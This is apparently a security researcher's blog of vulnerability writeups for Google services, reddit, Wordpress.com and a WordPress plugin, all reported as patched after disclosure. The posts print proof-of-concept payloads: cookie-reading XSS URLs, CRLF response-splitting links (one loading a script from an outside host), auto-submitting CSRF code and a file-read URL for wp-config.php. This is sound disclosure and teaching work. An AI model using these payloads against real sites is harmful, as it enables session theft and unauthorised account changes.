Category: Vulnerability Writeups
2011
02.03

[Note: According to Google, I was not the first person to report this vulnerability to them. If the original reporter cares to come forward, I’ll be more than happy to cite their work in this writeup :-)]

Summary

Blogger’s Design Preview functionality served up author-generated content in the context of blogger.com, allowing an author to perform an XSS attack against a blog administrator.

How did it work?

Blogger is designed to allow authors to include arbitrary content in their blog posts. As the Google Security Team explains:

Blogger users are permitted to place non-Google as well as Google JavaScript in their own blog templates and blog posts; our take on this is that blogs are user-generated content, in the same way that a third party can create their own website on the Internet. Naturally, for your safety, we do employ spam and malware detection technologies — but we believe that the flexibility in managing your own content is essential to the success of our blogging platform.

Note: when evaluating the security of blogspot.com, keep in mind that all the account management functionality – and all the associated HTTP cookies – use separate blogger.com and google.com domains.

So, for an attack on Blogger to be anything more than an annoyance, it has to target blogger.com or google.com rather than the subdomain where the blog is hosted.

In this case, there was a vulnerability in how user-generated content was presented on Blogger’s backend, which is served from blogger.com. The vulnerability involved Blogger’s Design Preview functionality, which is used by administrators to test layout changes. The preview of the blog’s content was being served from blogger.com, not from the blog’s (sub)domain. As a result, any JavaScript or other malicious content contained on the page (for instance, from a post written by an author) would be run in the context of blogger.com, exposing cookies and other sensitive information.

The JavaScript in the post creates an alert box with the value of document.location. As you can see, the JavaScript was executed on blogger.com.

Same JavaScript as the example above, but executed using the Preview button on the Edit HTML page of the Design section.

This vulnerability required the attacker to have author-level (or higher) privileges on the same blog as the target, limiting its effectiveness. However, a malicious author could have used this vulnerability to perform privilege escalation via a CSRF attack, giving themselves administrator-level privileges on the blog.

More Information

The vulnerability mentioned here has been confirmed patched by the Google Security Team. I owe them a ton of thanks for organizing this program and giving me a chance to improve my skills.

Interested readers are encouraged to take a look at other vulnerabilities I’ve reported under Google’s Vulnerability Reward Program.

2011
02.01

Summary

Google Code contained a static HTML page that was vulnerable to a reflected, DOM-based XSS vulnerability.

How Did It Work?

The page in question is located at http://code.google.com/testing/iframe_example.html. I originally came across it when I was performing a Google search for an unrelated vulnerability: I’m not sure how I would have found it otherwise. :-P

The page itself is fairly straightforward. It uses JavaScript to parse the query string and extract key/value pairs; it then uses document.write to add the data provided by the user directly to the page. If you look at the HTML on the page right now, you can see that user input is sanitized using JavaScript’s escape function: in the past, that was not the case. That lack of sanitization is what allowed the vulnerability to occur.
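
To make the pattern concrete, here is a minimal sketch of what such a page looks like. This is my own illustration, not the page’s actual source: the variable names and structure are hypothetical, but the core mistake (writing query-string values straight into the document) is the same, and the eventual fix amounted to wrapping the user-supplied value in escape.

// Illustrative sketch only; names and structure are hypothetical.
// Parse ?key=value pairs out of the query string...
var params = {};
var pairs = window.location.search.substring(1).split('&');
for (var i = 0; i < pairs.length; i++) {
    var parts = pairs[i].split('=');
    params[parts[0]] = decodeURIComponent(parts[1] || '');
}
// ...then write one of them straight into the page. Anything placed in the
// url parameter, including <script> tags, becomes live markup:
document.write('<p>Framed URL: ' + params.url + '</p>');
// The patched page effectively does this instead:
// document.write('<p>Framed URL: ' + escape(params.url) + '</p>');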

JavaScript could be executed by entering HTML in the url field, for example.

More Information

The vulnerability mentioned here has been confirmed patched by the Google Security Team. I owe them a ton of thanks for organizing this program and giving me a chance to improve my skills (and for putting up with me even when I report vulnerabilities that, unlike this one, affect only IE 6 / 7 :-P )

Interested readers are encouraged to take a look at other vulnerabilities I’ve reported under Google’s Vulnerability Reward Program.

2011
01.14

Summary

Reddit.com was vulnerable to HTTP response splitting. As a result, it was possible to execute arbitrary JavaScript and HTML on the reddit.com domain.

What is HTTP Response Splitting?

From Wikipedia:

HTTP response splitting is a form of web application vulnerability, resulting from the failure of the application or its environment to properly sanitize input values. It can be used to perform cross-site scripting attacks, cross-user defacement, web cache poisoning, and similar exploits.

The attack consists of making the server print a carriage return (CR, ASCII 0x0D) line feed (LF, ASCII 0x0A) sequence followed by content supplied by the attacker in the header section of its response, typically by including them in input fields sent to the application. Per the HTTP standard (RFC 2616), headers are separated by one CRLF and the response’s headers are separated from its body by two. Therefore, the failure to remove CRs and LFs allows the attacker to set arbitrary headers, take control of the body, or break the response into two or more separate responses—hence the name.

The Web Application Security Consortium also has a good writeup, including sources with more details.

How Did The Vulnerability Work?

Reddit.com, like many sites on the Internet, has a redirect system built into its login functionality. If you’re viewing a page on reddit.com and choose to log in, the system will redirect you back to your original page afterward. The redirect functionality appears to be limited to pages on reddit.com and to reddit.com subdomains.

Under normal circumstances, a login URL with a redirect might look something like this:
http://reddit.com/login?dest=/r/reddit.com

If a user is already logged in, that URL will skip the login step and go straight to the redirection. The headers sent for that redirect look like this:

HTTP/1.1 302 Moved Temporarily  
Content-Type: text/html; charset=UTF-8  
Location: /r/reddit.com  
Pragma: no-cache  
Cache-Control: no-cache  
Content-Encoding: gzip  
Content-Length: 20  
Server: '; DROP TABLE servertypes; --  
Vary: Accept-Encoding  
Date: Fri, 14 Jan 2011 03:02:59 GMT  
Connection: keep-alive

Unfortunately, the vulnerability occurred because the “dest” parameter of the URL allowed an attacker to include newline characters (\r\n, or %0D%0A). Those characters were echoed literally into the response, giving an attacker control over part of the HTTP response sent by reddit’s servers.

To illustrate the point, let’s take a look at one of the proofs of concept I developed to demonstrate the vulnerability.

The malicious URL we’re interested in is http://www.reddit.com/login?dest=http://reddit.com/%0D%0ALocation:%20javascript:%0D%0A%0D%0A<script>alert(document.cookie)</script>. Because of the newline characters included in the “dest” parameter, the response sent by reddit’s servers would now look something like this:

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Location: /r/reddit.com
Location: javascript:

<script>alert(document.cookie)</script>
Pragma: no-cache
Cache-Control: no-cache
Content-Encoding: gzip
Content-Length: 20
Server: '; DROP TABLE servertypes; --
Vary: Accept-Encoding
Date: Fri, 14 Jan 2011 03:02:59 GMT
Connection: keep-alive

Two sets of newlines in a row (%0D%0A%0D%0A) indicate that the HTTP headers are finished and that the remainder of the response is the body. Normally, the body of a redirect response is never rendered: the browser simply follows the redirect. However, I used the second Location: header to confuse the browser, halting the redirect and causing it to display the body, which now contained the JavaScript I had injected.
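
If you want to see exactly which characters the encoded “dest” value smuggles in, decoding it in a JavaScript console makes the structure obvious (this is just an illustration of the encoding, not part of the attack itself):

// Decode the PoC's dest parameter to reveal the injected CRLFs.
var dest = 'http://reddit.com/%0D%0ALocation:%20javascript:%0D%0A%0D%0A' +
           '<script>alert(document.cookie)</script>';
console.log('Location: ' + decodeURIComponent(dest));
// Prints the original Location header, the second "Location: javascript:"
// header, a blank line, and then the injected script body, matching the
// split response shown above.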

Proofs of Concept

I developed a number of proofs of concept, since browser-specific behavior heavily influenced whether a given URL would trigger the XSS in a given browser.

  1. http://www.reddit.com/login?dest=http://reddit.com/%0D%0ALocation: javascript:%0D%0A%0D%0A<script>alert(document.cookie)</script>
    This proof of concept worked in Firefox only. Firefox halts the redirect and displays the body of the response if it encounters a second Location header containing something invalid (like a redirect to a JavaScript URI).
  2. http://www.reddit.com/login?dest=http://reddit.com/%00%0D%0A%0D%0A<script>alert(document.cookie)</script>
    This proof of concept worked in both Firefox and Chrome. Neither browser would follow the redirect; both displayed the body of the response when the Location header contained a null byte.
  3. http://www.reddit.com/login?dest=http://reddit.com/%00%0D%0A%0D%0A<script src="http://ha.ckers.org/xss.js"></script>
    This proof of concept worked in Safari only. It is similar to the second proof of concept, but it contains a different JavaScript payload: for some reason, Safari would not execute the JavaScript in the second proof of concept (I didn’t investigate the exact cause too much).

And of course, no XSS writeup would be complete without a picture. So, here’s a screenshot of the first proof of concept in action:

In Firefox 3.6.x, it was possible to trigger JavaScript by injecting a second, invalid Location header and a body containing <script> tags into the response.

In case anyone is curious, this vulnerability was patched within 48 hours of my original report.

Anything Else?

I want to thank reddit’s admins for supporting the responsible disclosure of security vulnerabilities. :-)

Also, if you have any questions about HTTP Response Splitting or other web application security vulnerabilities, feel free to leave them in the comments!

2011
01.10

Summary

Feedburner accounts were vulnerable to a CSRF attack against certain services (MyBrand and FeedBulletin). An attacker could cause a user to enable or disable these services (potentially disrupting end-user access to content, in the case of MyBrand).

How Did It Work?

This vulnerability was fairly straightforward. To activate/deactivate MyBrand/FeedBulletin, you sent a simple POST request (to http://feedburner.google.com/fb/a/mybrandSubmit for MyBrand and to http://feedburner.google.com/fb/a/feedbulletinSubmit for FeedBulletin). Neither of those requests required a CSRF token to be processed. Accordingly, an attacker could trick a user into submitting a request without their consent.

Consider a possible attack. The target, Alice, owns a blog located at AliceAppSec.org. Alice provides an RSS feed for her blog (http://feeds.aliceappsec.org/AliceAppSec) using FeedBurner’s MyBrand service. The attacker, Marvin, is a jealous competitor; he wants to disrupt Alice’s RSS feed. To do so, he crafts a page that automatically submits a malicious MyBrand-disabling POST request to FeedBurner. Once that’s done, all he needs to do is convince Alice to look at the page: if she’s signed in to FeedBurner, the POST request will disable MyBrand for her account, causing her feed to return a 404.

Since the vulnerability is now patched, the proof of concept I sent to Google no longer functions. However, I’ve made the code (a simple HTML page) available for anyone who wants to check it out.
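
For readers who don’t want to dig up that file, the idea fits in a few lines: an attacker-controlled page builds a form targeting the vulnerable endpoint and submits it as soon as it loads. The sketch below captures the shape of the attack; the field names are placeholders, since I’m not reproducing the real request parameters here.

// Auto-submitting cross-site form: sent with the victim's FeedBurner cookies,
// and (at the time) no CSRF token was required for it to be processed.
// Run after the document body has loaded.
var form = document.createElement('form');
form.method = 'POST';
form.action = 'http://feedburner.google.com/fb/a/mybrandSubmit';

var field = document.createElement('input');
field.type = 'hidden';
field.name = 'examplePlaceholderField';   // hypothetical parameter name
field.value = 'deactivate';               // hypothetical value
form.appendChild(field);

document.body.appendChild(form);
form.submit();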

More Information

The vulnerability mentioned here has been confirmed patched by the Google Security Team. I owe them a ton of thanks for organizing this program and giving me a chance to improve my skills (and for responding to my many emails, even late at night on Sundays). :-)

Interested readers are encouraged to take a look at other vulnerabilities I’ve reported under Google’s Vulnerability Reward Program.

2010
12.31

Yesterday, I ran across a very interesting XSS vulnerability involving Flash embeds and Wordpress.com. The vulnerable code is now patched (even during the holidays, Automattic’s response time was stellar), so here are all the juicy details. ;-)

In the interest of security, Wordpress.com limits what HTML elements its users are allowed to post on their blogs. Anyone who’s interested can read about those limits on the Wordpress.com site. However, to allow users to embed different types of content (e.g. videos, music, etc.), Wordpress.com supports a series of “shortcodes.” These codes are typically created for trusted websites (e.g. YouTube) and allow users to embed content without using HTML directly.

It turns out that VodPod, one of the websites with a Wordpress.com shortcode, provides a way to embed third party content. It does so by generating a URL like http://widgets.vodpod.com/w/video_embed/ExternalVideo.12345 which 301 redirects to your content hosted elsewhere. The Wordpress.com shortcode, when parsed, becomes an embed tag using the VodPod URL. Your browser will happily follow the redirect, allowing any SWF to be displayed within a Wordpress.com blog.

Now, under normal circumstances, that wouldn’t be an issue. These days, just the act of embedding a Flash applet on your page doesn’t cause security issues. However, there was a tiny issue with the HTML that Wordpress.com generated for embeds from VodPod. I’ve reproduced the bad embed code below:

<embed
src='http://widgets.vodpod.com/w/video_embed/ExternalVideo.12345'
type='application/x-shockwave-flash'
AllowScriptAccess='always'
pluginspage='http://www.macromedia.com/go/getflashplayer'
wmode='transparent'
flashvars='' width='425' height='350' />

The problem? The embed tag contained AllowScriptAccess='always'. According to Adobe’s documentation, that meant the embedded SWF could execute JavaScript in the context of the page it was being displayed on. Coupled with the ability to embed arbitrary SWFs from third parties, it made an XSS attack against Wordpress.com possible.

So, I shot off an email to Automattic’s security email address with the details: I received a reply very quickly and the vulnerability was patched (by changing the value for AllowScriptAccess to sameDomain) within a few hours. A very happy ending to this holiday tale. :)

2010
12.21

Summary

One page in Google’s Help Center was vulnerable to a reflected cross-site scripting attack.

How did it work?

The page in question contained the following snippet of JavaScript embedded within its HTML:

/*
function fileCartReport(form) {
    var comment = form.elements['body'].value;
    var entityStrEscaped = 'entity text';
    var entityStr = entityStrEscaped.replace(/&quot;/g, '"');
    var client = '0' * 1;
    cartReporter().fileCartReport(entityStr, getAbuseType(), comment, client, function () {
        form.submit();
    });
}
*/

function fileCartReport(form) {
    var entityStrEscaped = 'entity text';
    var entityStr = entityStrEscaped.replace(/&quot;/g, '"')
    var report = {
        entityId: entityStr,
        abuseCategory: getAbuseType(),
        comment: form.elements['body'].value,
        applicationId: '0' * 1,
        language: 'en'
    }
    cartReporter().fileCartReport(report, function () {
        form.submit();
    });
}

In the real code, the string entity text was actually the value of a parameter named entity passed in the URL. In normal links to the page, the entity parameter was a JSON-encoded string, which the rest of the JavaScript would then submit back to Google. However, since the data was being passed in the URL, it was possible to change the value placed in the JavaScript.

Of course, the value wasn’t fully under my control: for instance, there was still some input escaping that turned single quotes and double quotes into HTML entities. As a result, I couldn’t find a way to inject arbitrary JavaScript into the uncommented function. However, I realized that it was possible to inject it into the commented function: all I needed to do was begin my payload with */ (which closed the existing block comment) and end it with /* (so the original closing */ still had something to match). At that point, I could write just about any JavaScript I wanted in between (keeping in mind the restrictions imposed by the input escaping).
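
To make that concrete, here is roughly what the commented-out block becomes when the entity parameter is set to a payload along the lines of */alert(document.cookie)/* (the exact payload here is illustrative):

// The leading */ in the injected value terminates the surrounding block
// comment, alert(document.cookie) runs as live code, and the trailing /*
// re-opens a comment that the original closing */ then terminates.
/*
function fileCartReport(form) {
    var comment = form.elements['body'].value;
    var entityStrEscaped = '*/alert(document.cookie)/*';
    var entityStr = entityStrEscaped.replace(/&quot;/g, '"');
    var client = '0' * 1;
    cartReporter().fileCartReport(entityStr, getAbuseType(), comment, client, function () {
        form.submit();
    });
}
*/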

The vulnerability in action

I remembered to grab a screenshot of the vulnerability as I was testing for it, and I’ve reproduced it below:

The XSS vulnerability in action (in Google Chrome)

More Information

The vulnerability mentioned here has been confirmed patched by the Google Security Team. I owe them a ton of thanks for organizing this program and giving me a chance to improve my skills. :-)

Interested readers are encouraged to take a look at other vulnerabilities I’ve reported under Google’s Vulnerability Reward Program.

2010
12.17

Summary

The new Google Groups interface contained an XSS vulnerability in its search functionality. The vulnerability required some user interaction to be activated.

How Did It Work?

The search box at the top of the new interface is designed to provide some type-ahead functionality: as the user types, his/her input is scanned and used to create a drop down menu of choices. Unfortunately, user input was not properly sanitized; for instance, typing <u> into the search box caused drop down menu items to become underlined. As a result of this oversight, it was possible to type arbitrary HTML/JavaScript into the search box and have it executed by the page.

The new interface’s type-ahead functionality, hard at work

My next step was to find a way to pass a malicious search string to a user. As it turned out, the interface provided a way to link to search results: visiting https://groups.google.com/forum/?fromgroups#!searchin/googlegroups-announce/<script>alert(document.cookie)<%2Fscript> would put <script>alert(document.cookie)</script> into the user’s search box.

Executing that malicious string required a little user interaction, however. The drop down box (and accordingly, the XSS) would only be activated when the user interacted with the search field. It was possible for a user to avoid the XSS by clicking in the box, highlighting the text, and deleting the entire string (or changing a character in the string so that the script failed to run). However, any other kind of interaction would have triggered the script’s execution.

More Information

The vulnerability mentioned here has been confirmed patched by the Google Security Team. I owe them a ton of thanks for organizing this program and giving me a chance to improve my skills. :-)

Interested readers are encouraged to take a look at other vulnerabilities I’ve reported under Google’s Vulnerability Reward Program.

2010
12.07

Summary

Google Scholar was vulnerable to minor but potentially annoying CSRF attacks on two different pages. The regular Google search equivalents of both pages used CSRF tokens to prevent these problems.

Vulnerability #1

There was no CSRF protection used when saving preferences in Google Scholar. So, browsing to the following URL used to set your language on Google Scholar to Arabic and set your search results to return papers written in Chinese: http://scholar.google.com/scholar_setprefs?hl=ar&lang=some&lr=lang_zh-CN&submit. As of right now, the URL no longer updates user preferences (although it does change the language for the current page, and any page accessed from links/forms off of that page).

Vulnerability #2

There was no CSRF check in place for setting up email alerts in Google Scholar. A simple POST to http://scholar.google.com/scholar_alerts?view_op=list_alerts&hl=en where the POST data was

alert_query=[SOME QUERY]&
alert_max_results=10&
create_alert_btn=Create+alert

would have resulted in an alert being created for the currently logged in user (there was a parameter, email_for_op, that was passed in during a real request: removing it seemed to cause the system to default to the currently logged in user’s email address).

More Information

The vulnerabilities mentioned here have all been confirmed patched by the Google Security Team. I owe them a ton of thanks for organizing this program and giving me a chance to improve my skills. :-)

To see more posts I’ve written about vulnerabilities reported under Google’s Vulnerability Reward Program, please click here.

2010
11.30

Summary

Google Calendar was vulnerable to a series of CSRF vulnerabilities. In two separate instances, I found that existing countermeasures (CSRF tokens) were not being validated by the application.

Walkthroughs

Example #1

In the first instance, I found it was possible to add an arbitrary event to a user’s calendar. I used Google Calendar’s “quick add” feature: it allows users to click on a space on the calendar and type in the name of an event, which adds it to the calendar. By monitoring the HTTP traffic between my browser and Google, I determined that the calendar entry was being created by a GET request that looked something like this (I’ve broken up the URL for the sake of readability):

http://www.google.com/calendar/event?
dates=20101103T003000%2F20101103T013000
&text=asfsaf
&pprop=HowCreated%3ADRAG
&src=kmVhbF9wb29sLUBicm93bi5lZGU
&ctz=America%2FNew_York
&eid=1288669371381
&sf=true
&action=CREATE
&output=js
&lef=LHZkMjYxNDNmODNlOTBlbnZqMTQ0amh1Ym9AZ3JvdXAuY2FsZW5kYXIuZ29vZ2xlLmNvbQ
&lef=MW4udXNhI2hvbGlkYXlAZ3JvdXVudi5jYWxlbmRhci5nb29nbGUuY29t
&lef=bsVhbF9wb21sZUBicm92bi5lZHU
&droi=20101024T000000%2F20101212T000000
&secid=-_1FyItA6aDLfYZl6GhuK62s74o

The first thing I tried was removing the secid parameter (which I assumed to be a CSRF token): surprisingly, while the response output changed slightly, the request still created a new event on the calendar. I then experimented through trial and error with removing more parameters until I got the URL down to the following:

http://www.google.com/calendar/event?
dates=20101103T003000%2F20101103T013000
&text=asfsaf
&sf=true
&action=CREATE

An attacker could have provided that URL to a target in any number of ways: just visiting it would have added a corresponding entry to the target’s calendar.
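
Because the request was a plain GET with no token, it didn’t even require the target to knowingly navigate anywhere. The following sketch shows one of many possible delivery mechanisms, firing the forged request silently from an attacker-controlled page (the URL is the trimmed-down one above):

// The victim's Google cookies are attached automatically, so loading this
// "image" creates the calendar entry without any visible navigation.
var img = new Image();
img.src = 'http://www.google.com/calendar/event' +
          '?dates=20101103T003000%2F20101103T013000' +
          '&text=asfsaf' +
          '&sf=true' +
          '&action=CREATE';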

Example #2

The second instance involved changing the privacy settings of an existing calendar. To do so, an attacker first needed to determine the calendar’s unique identifier. I proposed the following method for finding such an identifier, assuming the target is a Gmail user (and we’re interested in their default, personal calendar):

  1. Identify the target. Let’s say the target is example@gmail.com.
  2. Register a Gmail account where the first letter of the account is different from the target’s. So, here, I might register fxample@gmail.com
  3. Sign in to Google Calendar as the attacker and take a look at the printable image version of your calendar. It will have the attacker’s email address in the upper left-hand corner. The URL for the image looks something like this (I’ve omitted unnecessary parameters): https://www.google.com/calendar/printable?src=[SOME STR]&psdec=true&pft=png
  4. Through trial and error, try different permutations of letters/numbers in the first few characters of the src parameter. You can see how your changes affect the decoded string by looking in the upper left of the image: it will display a new email address based on your changes (sometimes it might tell you that the src is invalid, in which case you just continue trying). There’s a small enough number of possibilities that it can be brute-forced.
  5. Eventually, you figure out what the right src value is for the target: the email on top will match the target’s email address.

From there, the rest was simple. Privacy settings were controlled by sending a POST request to https://www.google.com/calendar/editcaldetails. A CSRF token was included if the request was made via the web interface, but omitting the token did not prevent the request from functioning. The POST body consisted of just the following:

dtid=[VALID-SRC]
&ap=X19wdWJsaWNfcHJpbmNpcGFsX19dcHVibGljxmNhbGVuZGFyLmdvb2dsZS5jb20
&ap=20

where [VALID-SRC] was the valid src found in step 5 and the rest was a constant derived from the HTML for the corresponding form in the web interface.

More Information

The vulnerabilities mentioned here have all been confirmed patched by the Google Security Team.

To see more posts I’ve written about vulnerabilities reported under Google’s Vulnerability Reward Program, please click here.

2010
08.06

Last weekend, I evaluated a couple of Wordpress plugins that I wanted to add to this site. One of the plugins I looked at was Scripts Gzip: its goal is to reduce the number of requests needed to fetch CSS/JS. As the author puts it:

It does not cache, minify, have a “PRO” support forum that costs money, keep any logs or have any fancy graphics. It only does one thing, merge+compress, and it does it relatively well.

I happened to take a look at the plugin’s code because I was curious how it was fetching the CSS/JS. However, I soon discovered a number of fairly serious security vulnerabilities. I immediately contacted the author with an explanation of what I had found. He responded quickly, acknowledged the issues, and released a new version of the plugin that addressed all of the vulnerabilities I had found.

Since a fixed version of the plugin has now been released, I feel comfortable discussing the flaws publicly. I’ll be giving a brief synopsis along with details about each vulnerability, ordered below from most to least serious.

1. Arbitrary Exposure of File Contents

This vulnerability was quite serious. It allowed an attacker to view the complete contents of any file within the Wordpress directory, even sensitive PHP files like wp-config.php.

The problem came from this function in gzip.php:

<?php
private function collectData($options)
{
    $returnValue = array('data' => '', 'latestModified' => null);
    foreach($options['files'] as $file)
    {
        $oldDirectory = getcwd();
        $parsedURL = parse_url($file);
        $file = $parsedURL['path'];
        $file = preg_replace('/\.\./', '', $file);  // Avoid people trying to get into directories they're not allowed into.
        $parents = '../../../';                 // wp-content / plugins / scripts_gzip
        $realFile =  $parents . $file;
        if (!is_readable($realFile))
            continue;

        if ($options['mime_type'] == 'text/css')
        {
            chdir($parents);
            $base = getcwd() . '/';
            // Import all the files that need importing.
            $contents = $this->import(array(
                'contents' => '',
                'base' => $base,
                'file' => $file,
            ));
            // Now replace all relative urls with ones that are relative from this directory.
            $contents = $this->replaceURLs(array(
                'contents' => $contents,
                'base' => $base,
                'parents' => $parents,
            ));
        }
        else
        {
            $contents = file_get_contents($realFile);
        }

        $returnValue['data'] .= $contents;

        if ($options['mime_type'] == 'application/javascript')
            $returnValue['data'] .= ";\r\n";

        chdir($oldDirectory);

        $returnValue['latestModified'] = max($returnValue['latestModified'], filemtime($realFile));
    }
    return $returnValue;
}

The key to understanding this vulnerability is understanding the inputs. $options is an array containing user data, including the names of files that the user has asked the script to gzip. The checks at the top of the loop (the parse_url/preg_replace handling and the is_readable call) sanitize and validate the request, preventing the user from loading files outside of the Wordpress directory or loading non-existent files. However, in the else branch, which is taken when the user requests that JS be gzipped, the requested file is passed straight to file_get_contents without any other special validation.

As a concrete example, we can say that http://example.com/wordpress/wp-content/plugins/scripts-gzip/gzip.php?js=wp-config.php would load the Wordpress configuration file on a vulnerable installation.

2. “Limited” Exposure of File Contents

A less serious security vulnerability occurs if the attacker tries loading CSS instead of JS. As we can see from the code above, if the script is loading CSS it calls an import function, which is reproduced in part below.

<?php
/**
 * Import a CSS @import.
 */
private function import($options)
{
    $dirname = dirname($options['file']);
    if (!is_readable($dirname))
        return $options['contents'];

    // SECURITY: file may not be outside our WP install.
    if (!str_startsWith(realpath($options['file']), $options['base']))
        return $options['contents'];

    // SECURITY: file may not be a php file.
    if (strpos($options['file'], '.php') !== false)
        return $options['contents'];

    // Change the directory to the new file.
    chdir($dirname);
    $newContents = file_get_contents(basename($options['file']));

    // The rest of the code has been omitted for space considerations
}

It’s clear that this code path does do some extra validation. However, we can also see that the validation is not strong enough. It employs a blacklist model (forbidding files ending in .php) rather than a whitelist model (e.g. only allowing files ending in .css). Accordingly, an attacker can request potentially sensitive but not forbidden files (e.g. .htaccess) that are within the Wordpress directory.

As another concrete example, we can say that http://example.com/wordpress/wp-content/plugins/scripts-gzip/gzip.php?css=.htaccess would load the .htaccess file for Wordpress, if it exists.

3. Path Disclosure

This vulnerability is the least serious of the bunch. However, a path disclosure vulnerability can be useful for hackers looking to gain more information about a target, and it can make other sorts of attacks easier to pull off. This vulnerability required an attacker to be able to write a file somewhere within the Wordpress directory (possible, for example, if they’re allowed to upload attachments). If the file contained a line with url(‘…’) and the script were directed to parse it as CSS, the result returned would contain the absolute path to the Wordpress directory.

Summary

All of these vulnerabilities have been resolved in the latest version of the plugin, 0.9.1. I urge anyone using Scripts Gzip to upgrade as soon as possible. I’d especially like to thank the plugin’s author, Edward Hevlund, for his speedy responses to my emails, his attentiveness to security issues, and (of course) for a wonderfully useful plugin.